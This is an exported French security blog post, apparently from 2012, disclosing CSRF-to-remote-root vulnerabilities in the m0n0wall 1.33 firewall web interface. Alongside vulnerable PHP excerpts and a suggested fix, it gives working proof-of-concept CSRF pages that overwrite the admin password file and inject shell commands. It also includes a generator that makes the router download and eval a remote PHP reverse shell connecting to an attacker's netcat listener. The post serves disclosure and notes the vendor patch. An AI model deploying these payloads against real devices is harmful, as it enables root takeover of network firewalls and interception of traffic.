{"id":461,"date":"2012-11-16T17:50:30","date_gmt":"2012-11-16T15:50:30","guid":{"rendered":"https:\/\/www.asafety.fr\/?p=461"},"modified":"2016-07-25T00:42:29","modified_gmt":"2016-07-24T22:42:29","slug":"csrf-rce-m0n0wall-1-33-remote-root-access","status":"publish","type":"post","link":"https:\/\/www.asafety.fr\/en\/vuln-exploit-poc\/csrf-rce-m0n0wall-1-33-remote-root-access\/","title":{"rendered":"[CSRF RCE] m0n0wall 1.33 Remote root Access"},"content":{"rendered":"

<\/p>\n

Une vuln\u00e9rabilit\u00e9 de type CSRF RCE permettant l’obtention d’un shell root a \u00e9t\u00e9 d\u00e9couverte sur m0n0wall.<\/p>\n

m0n0wall<\/a> est une distribution tr\u00e8s l\u00e9g\u00e8re (environ 10Mo) qui fait office de routeur\/firewall bas\u00e9e sur FreeBSD et jug\u00e9e d’une grande fiabilit\u00e9. Elle a d’ailleurs donn\u00e9 naissance \u00e0 divers projets comme pfSense<\/a>. Fournissant une interface d’administration web compl\u00e8te pour la gestion du firewall, ainsi que des fonctionnalit\u00e9s au d\u00e9marrage via un terminal sp\u00e9cifique, m0n0wall a largement \u00e9t\u00e9 adopt\u00e9 dans le monde de l’embarqu\u00e9 de part sa puissance, sa fiabilit\u00e9 et sa l\u00e9g\u00e8ret\u00e9.<\/p>\n

Il m’a \u00e9t\u00e9 n\u00e9cessaire d’exploiter ses diverses fonctionnalit\u00e9s derni\u00e8rement au sein\u00a0d\u2019environnements\u00a0virtuels, et donc de m’attarder sur son fonctionnement interne.<\/p>\n

De cette analyse en est principalement ressorti l’exploitation de vuln\u00e9rabilit\u00e9 de type CSRF, qui permettent l’obtention d’un shell root \u00e0 distance (RCE) :<\/p>\n

\n

Les attaques de type Cross-Site Request Forgery (abr\u00e9g\u00e9es CSRF prononc\u00e9es sea-surfing ou parfois XSRF) utilisent l’utilisateur comme d\u00e9clencheur, celui-ci devient complice sans en \u00eatre conscient. L’attaque \u00e9tant actionn\u00e9e par l’utilisateur, un grand nombre de syst\u00e8mes d’authentification sont contourn\u00e9s.<\/p>\n<\/blockquote>\n

L’analyse s’est principalement port\u00e9e vers l’administration WebGUI de m0n0wall, enti\u00e8rement \u00e9crite en PHP. Du fait de sa l\u00e9g\u00e8ret\u00e9, le projet m0n0wall n’int\u00e8gre que tr\u00e8s peu de frameworks et biblioth\u00e8ques web additionnelles, contrairement \u00e0 pfSense qui impl\u00e9mente CSRFMagic<\/a>, une solution de protection contre ce type d’attaque.<\/p>\n

\"m0n0wall<\/a>

m0n0wall interface web<\/p><\/div>\n

En guise d’exemple, quelques r\u00e9sultats d’analyses sont d\u00e9taill\u00e9s ci-apr\u00e8s.<\/p>\n

Fichier \/usr\/local\/www\/exec.php ligne 250 :<\/h3>\n

[php]$ph = popen($_POST[‘txtCommand’], &amp;amp;quot;r&amp;amp;quot; );[\/php]<\/p>\n

La fonction “popen()<\/a>“, qui permet l’ex\u00e9cution d’un processus ou d’une commande sur le syst\u00e8me, exploite directement une variable $_POST sans que celle-ci ne soit nettoy\u00e9e.<\/p>\n

PoC d’un exploit CSRF qui red\u00e9fini le mot de passe “mono” pour le compte administrateur via cette vuln\u00e9rabilit\u00e9 :<\/p>\n

[html]&amp;amp;lt;html&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n&amp;amp;lt;body&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n&amp;amp;lt;form name=’x’ action=’http:\/\/m0n0wall_IP:80\/exec.php’ method=’post’&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n&amp;amp;lt;input type=’hidden’ name=’txtCommand’ value=’echo &amp;amp;quot;admin:\\$1\\$UHzbn8k6\\$RmvocDPCsXm0uW4SYZAcA\/&amp;amp;quot; &amp;amp;gt; \/usr\/local\/www\/.htpasswd’ \/&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n&amp;amp;lt;\/form&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n&amp;amp;lt;script&amp;amp;gt;document.forms[‘x’].submit();&amp;amp;lt;\/script&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n&amp;amp;lt;\/body&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n&amp;amp;lt;\/html&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n[\/html]<\/p>\n

Fichier \/usr\/local\/www\/diag_ping.php ligne 159 et 161 :<\/h3>\n

[php]system(&amp;amp;quot;\/sbin\/$pingprog -S$ifaddr -c$count &amp;amp;quot; . escapeshellarg($host));&amp;lt;br \/&amp;gt;
\n[…]&amp;lt;br \/&amp;gt;
\nsystem(&amp;amp;quot;\/sbin\/$pingprog -c$count &amp;amp;quot; . escapeshellarg($host));[\/php]<\/p>\n

Idem sur ces lignes, une CSRF permet l’ex\u00e9cution de commande au travers de ces deux appels \u00e0 la fonction “system()” de PHP. La variable en cause est “$count”. Celle-ci est d\u00e9finie dans le m\u00eame fichier \u00e0 la ligne 55 :<\/p>\n

[php]$count = $_POST[‘count’];[\/php]<\/p>\n

Mais cette variable n’est d\u00e9finie que si la condition de la ligne 47 est v\u00e9rifi\u00e9e (plac\u00e9e \u00e0 “false”) :<\/p>\n

[php]if (($_POST[‘count’] &amp;amp;lt; 1) || ($_POST[‘count’] &amp;amp;gt; MAX_COUNT)) {[\/php]<\/p>\n

Par cons\u00e9quent, si un assaillant fait pr\u00e9c\u00e9der son injection CSRF avec un nombre entre 1 et 10, alors $count sera d\u00e9finie sans \u00eatre nettoy\u00e9e. Pour prot\u00e9ger ce cas, il faudrait modifier la condition en for\u00e7ant un transtypage vers un entier par exemple :<\/p>\n

[php]if ((intval($_POST[‘count’]) &amp;amp;lt; 1) || (intval($_POST[‘count’]) &amp;amp;gt; MAX_COUNT)) {[\/php]<\/p>\n

PoC d’un exploit CSRF qui liste le contenu du r\u00e9pertoire courant (ls -la) via cette vuln\u00e9rabilit\u00e9 :<\/p>\n

[html]&amp;amp;lt;html&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;body&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;form name=’x’ action=’http:\/\/m0n0wall_IP:80\/diag_ping.php’ method=’post’&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;input type=’hidden’ name=’count’ value=’1;ls -la;’ \/&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;input type=’hidden’ name=’host’ value=’127.0.0.1′ \/&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;\/form&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;script&amp;amp;gt;document.forms[‘x’].submit();&amp;amp;lt;\/script&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;\/body&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n&amp;amp;lt;\/html&amp;amp;gt;[\/html]<\/p>\n

Fichier \/usr\/local\/www\/exec_raw.php ligne 36 :<\/h3>\n

[php]passthru($_GET[‘cmd’]);[\/php]<\/p>\n

Cette instruction est d’une grande dangerosit\u00e9. En effet, la fonction “passthru()” permet d’ex\u00e9cuter des commandes directement sur le serveur, et le tout via variable GET sans aucun nettoyage. Ce fichier restitue directement \u00e0 l’\u00e9cran au format “raw” le r\u00e9sultat des commandes entr\u00e9es. Il est principalement utilis\u00e9 par les addons\/plugins qui peuvent s’installer et \u00e9quiper m0n0wall.<\/p>\n

Au travers de cette instruction exploitable, un assaillant peu obtenir un reverse-shell complet et interactif \u00e0 distance. Afin d’appuyer ces propos, je me suis attel\u00e9 \u00e0 la conception d’un PoC qui s’est av\u00e9r\u00e9 bien plus compliqu\u00e9 que pr\u00e9vu.<\/p>\n

Pour l’obtention d’un tel reverse-shell, il faut dans un premier temps \u00e9tablir les programmes suceptibles de transmettre au travers d’un socket les entr\u00e9es\/sorties d’un programme tiers (\/bin\/sh en l’occurence). Or, m0n0wall pr\u00f4ne la l\u00e9g\u00e8ret\u00e9 du haut de ses 10Mo, et n’inclu donc qu’un nombre tr\u00e8s limit\u00e9 d’outils et de commandes. Pas de netcat, de socat, de perl, de python, de ruby ou encore de telnet… Toutefois PHP est pr\u00e9sent et dispose de la biblioth\u00e8que de socket !<\/p>\n

En effet, chaque fichier PHP du WebGUI de m0n0wall doit commencer par la d\u00e9claration suivante :<\/p>\n

[bash]#!\/usr\/local\/bin\/php[\/bash]<\/p>\n

Je me suis donc orient\u00e9 vers une ex\u00e9cution de code PHP directement en ligne de commande (mode CLI), sans succ\u00e8s. Apr\u00e8s un nombre incalculable de syntaxe r\u00e9alis\u00e9e, m0n0wall ne semblait pas vouloir autoriser l’ex\u00e9cution de code PHP au travers du terminal directement, mais uniquement par un appel au serveur web via un navigateur.<\/p>\n

Il fallait donc concevoir un fichier PHP manuellement, destin\u00e9 \u00e0 manipuler les sockets pour se connecter \u00e0 un h\u00f4te distant, placer ce fichier \u00e0 la racine du serveur web avec le bon en-t\u00eate, le bon chmod, puis finalement faire appel \u00e0 ce fichier.<\/p>\n

Pour \u00e9tablir un reverse-shell en PHP, PenTestMonkey met \u00e0 disposition un outil “php-reverse-shell<\/a>” o\u00f9 il suffit d’indiquer l’h\u00f4te \u00e0 contacter et le port de connexion. Ainsi, l’id\u00e9e est de placer ce fichier PHP sur un serveur web quelconque (accessible par m0n0wall), renommer ce fichier en .txt pour que la source soit lisible \u00e0 distance, et bien indiquer l’h\u00f4te et le port de connexion.<\/p>\n

Suite \u00e0 cela, une CSRF pr\u00e9cise permet de cr\u00e9er sur m0n0wall ce fichier avec la bonne en-t\u00eate et le bon chmod, puis dans un second temps, de faire appel \u00e0 ce fichier pour \u00e9tablir le reverse-shell. La m\u00e9thode est un peu tordue mais totalement fonctionnelle comme le prouve la vid\u00e9o de d\u00e9monstration<\/a> r\u00e9alis\u00e9e \u00e0 cet effet.<\/p>\n

[youtube]https:\/\/www.youtube.com\/watch?v=It288h9VtV4[\/youtube]<\/p>\n

Le code complet du g\u00e9n\u00e9rateur de la CSRF :<\/h3>\n

[html]&amp;lt;\/p&amp;gt;
\n&amp;lt;p&amp;gt;&amp;amp;lt;html&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;head&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n&amp;amp;lt;script&amp;amp;gt;&amp;lt;br \/&amp;gt;
\nfunction trim(s){&amp;lt;br \/&amp;gt;
\nreturn s.replace(\/\\r\\n|\\r|\\n|\\t\/g,”).replace(\/^\\s+\/g,”).replace(\/\\s+$\/g,”);&amp;lt;br \/&amp;gt;
\n}&amp;lt;\/p&amp;gt;
\n&amp;lt;p&amp;gt;function generateCSRF(){&amp;lt;br \/&amp;gt;
\nvar target = trim(document.getElementById(&amp;amp;quot;target&amp;amp;quot;).value);&amp;lt;br \/&amp;gt;
\nvar httpurl = trim(document.getElementById(&amp;amp;quot;httpurl&amp;amp;quot;).value);&amp;lt;br \/&amp;gt;
\nvar resultjs = &amp;amp;quot;&amp;amp;quot;;&amp;lt;br \/&amp;gt;
\nresultjs += &amp;amp;quot;&amp;amp;lt;html&amp;amp;gt;&amp;amp;lt;body&amp;amp;gt;&amp;amp;quot;;&amp;lt;br \/&amp;gt;
\nresultjs += &amp;amp;quot;&amp;amp;lt;img src=’&amp;amp;quot; + target + &amp;amp;quot;exec_raw.php?cmd=echo%20-e%20%22%23%21\/usr\/local\/bin\/php%5Cn%3C%3Fphp%20eval%28%27%3F%3E%20%27.file_get_contents%28%27http%3A\/\/&amp;amp;quot; + httpurl + &amp;amp;quot;%27%29.%27%3C%3Fphp%20%27%29%3B%20%3F%3E%22%20%3E%20x.php%3Bcat%20x.php%3Bchmod%20755%20x.php%3B’ \/&amp;amp;gt;&amp;amp;quot;;&amp;lt;br \/&amp;gt;
\nresultjs += &amp;amp;quot;&amp;amp;lt;script type=’text\/javascript’&amp;amp;gt;function redirect(page){window.location=page;}setTimeout(‘redirect(\\&amp;amp;quot;&amp;amp;quot; + target + &amp;amp;quot;x.php\\&amp;amp;quot;)’,1000);&amp;amp;lt;\\\/script&amp;amp;gt;&amp;amp;lt;\/body&amp;amp;gt;&amp;amp;lt;\/html&amp;amp;gt;&amp;amp;quot;;&amp;lt;br \/&amp;gt;
\ndocument.getElementById(&amp;amp;quot;resultjs&amp;amp;quot;).value = resultjs;&amp;lt;br \/&amp;gt;
\n}&amp;lt;\/p&amp;gt;
\n&amp;lt;p&amp;gt;&amp;amp;lt;\/script&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n&amp;amp;lt;\/head&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;body onload=&amp;amp;quot;generateCSRF();&amp;amp;quot;&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;h2&amp;amp;gt;CSRF m0n0wall 1.33 to root RCE (reverse shell)&amp;amp;lt;\/h2&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;p&amp;amp;gt;m0n0wall 1.33, the latest firewall\/router distribution based on FreeBSD is vulnerable to a CSRF attack that allows gaining root access through a reverse shell.&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n The attacker must know the URL address of m0n0wall WebGui.&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n To obtain the reverseshell, attacker must place a netcat in listening mode.&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n On attacker machine :&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;pre&amp;amp;gt;nc -l -vv -p 1337 # Netcat listener, to gain shell control.&amp;amp;lt;\/pre&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n (admin hash is in the \/config\/config.xml file on m0n0wall, and WebGUI access is checked with \/usr\/local\/www\/.htpasswd)&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;\/p&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;form action=&amp;amp;quot;&amp;amp;quot; onsubmit=&amp;amp;quot;generateCSRF();return false;&amp;amp;quot;&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;table&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;tr&amp;amp;gt;&amp;amp;lt;td&amp;amp;gt;URL’s m0n0wall 1.33 Targeted :&amp;amp;lt;\/td&amp;amp;gt; &amp;amp;lt;td&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;input id=&amp;amp;quot;target&amp;amp;quot; type=&amp;amp;quot;text&amp;amp;quot; value=&amp;amp;quot;http:\/\/192.168.0.253:80\/&amp;amp;quot; size=&amp;amp;quot;70&amp;amp;quot; onkeyup=&amp;amp;quot;generateCSRF();&amp;amp;quot; \/&amp;amp;gt;&amp;amp;lt;\/td&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;\/tr&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;tr&amp;amp;gt;&amp;amp;lt;td&amp;amp;gt; HTTP URL to download php-reverse-shell.txt &amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n You need to download php-reverse-shell &amp;amp;lt;a href=&amp;amp;quot;http:\/\/pentestmonkey.net\/tools\/web-shells\/php-reverse-shell&amp;amp;quot; target=&amp;amp;quot;_blank&amp;amp;quot;&amp;amp;gt;here&amp;amp;lt;\/a&amp;amp;gt; !&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n Edit the script to indicate :&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;pre&amp;amp;gt;$ip = ‘ATTACKER_IP_REVERSE_SHELL’; \/\/ CHANGE THIS&amp;lt;br \/&amp;gt;
\n$port = PORT_IN_LISTENING_MODE; \/\/ CHANGE THIS&amp;amp;lt;\/pre&amp;amp;gt;&amp;lt;br \/&amp;gt;
\nThen, rename php-reverse-shell.php to psr.txt and host it on a accessible web server.&amp;amp;lt;\/td&amp;amp;gt; &amp;amp;lt;td&amp;amp;gt;http:\/\/&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;input id=&amp;amp;quot;httpurl&amp;amp;quot; type=&amp;amp;quot;text&amp;amp;quot; value=&amp;amp;quot;192.168.0.141\/prs.txt&amp;amp;quot; size=&amp;amp;quot;70&amp;amp;quot; onkeyup=&amp;amp;quot;generateCSRF();&amp;amp;quot; \/&amp;amp;gt;&amp;amp;lt;\/td&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;\/tr&amp;amp;gt;&amp;lt;\/p&amp;gt;
\n&amp;lt;p&amp;gt;&amp;amp;lt;tr&amp;amp;gt; &amp;amp;lt;td&amp;amp;gt;CSRF exploit to send to an admin : &amp;amp;lt;\/td&amp;amp;gt; &amp;amp;lt;td&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n&amp;amp;lt;textarea cols=&amp;amp;quot;70&amp;amp;quot; rows=&amp;amp;quot;10&amp;amp;quot; id=&amp;amp;quot;resultjs&amp;amp;quot; readonly=&amp;amp;quot;readonly&amp;amp;quot;&amp;amp;gt;&amp;amp;lt;\/textarea&amp;amp;gt; &amp;amp;lt;\/td&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;\/tr&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;\/table&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;\/form&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n &amp;amp;lt;\/body&amp;amp;gt;&amp;lt;br \/&amp;gt;
\n&amp;amp;lt;\/html&amp;amp;gt;&amp;lt;\/p&amp;gt;
\n&amp;lt;p&amp;gt;[\/html]<\/p>\n

Pour finaliser cet article, m0n0wall est une solution tr\u00e8s l\u00e9g\u00e8re et puissante qui a fait ses preuves au fil des ann\u00e9es. Toutefois certaines petites faiblesses subsistes permettant de corrompre un tel syst\u00e8me.<\/p>\n

Les membres du projet m0n0wall ont \u00e9t\u00e9 avertis vis-\u00e0-vis des quelques remarques faites au sein de cet article. Apr\u00e8s quelques \u00e9changes avec eux pour d\u00e9terminer les meilleurs moyens et m\u00e9canismes de protection \u00e0 impl\u00e9menter, la nouvelle release 1.34<\/a> vient enfin de voir le jour ! Je vous invite par cons\u00e9quent \u00e0 vous mettre \u00e0 niveau.<\/p>\n

Liens et ressources connexes :<\/strong><\/p>\n